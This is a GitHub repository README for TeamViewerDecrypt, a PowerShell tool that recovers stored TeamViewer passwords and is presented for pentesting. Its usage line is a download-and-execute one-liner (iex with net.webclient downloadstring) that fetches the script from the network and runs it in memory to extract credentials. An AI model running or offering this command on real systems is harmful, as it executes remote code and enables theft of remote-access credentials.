Skip to content

S3cur3Th1sSh1t/TeamViewerDecrypt

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 

Repository files navigation

TeamViewerDecrypt - Powershell

Just a quick dirty Powershell implementation of whynotsecurity´s Teamviewer decrypt script.

All credit goes to him, blog post can be found here: https://whynotsecurity.com/blog/teamviewer/

Not all passwords in every version can be decrypted using this script. I could not decrypt Teamviewer v14/v15 PermanentPasswords so far.

It worked for me for SecurityPasswordAES in Versions 7 and 8.

Usage as simple as:

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/TeamViewerDecrypt/master/TeamViewerDecrypt.ps1');TeamviewerDecrypt

alt text

As always only use for educational or pentesting purposes. :)

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published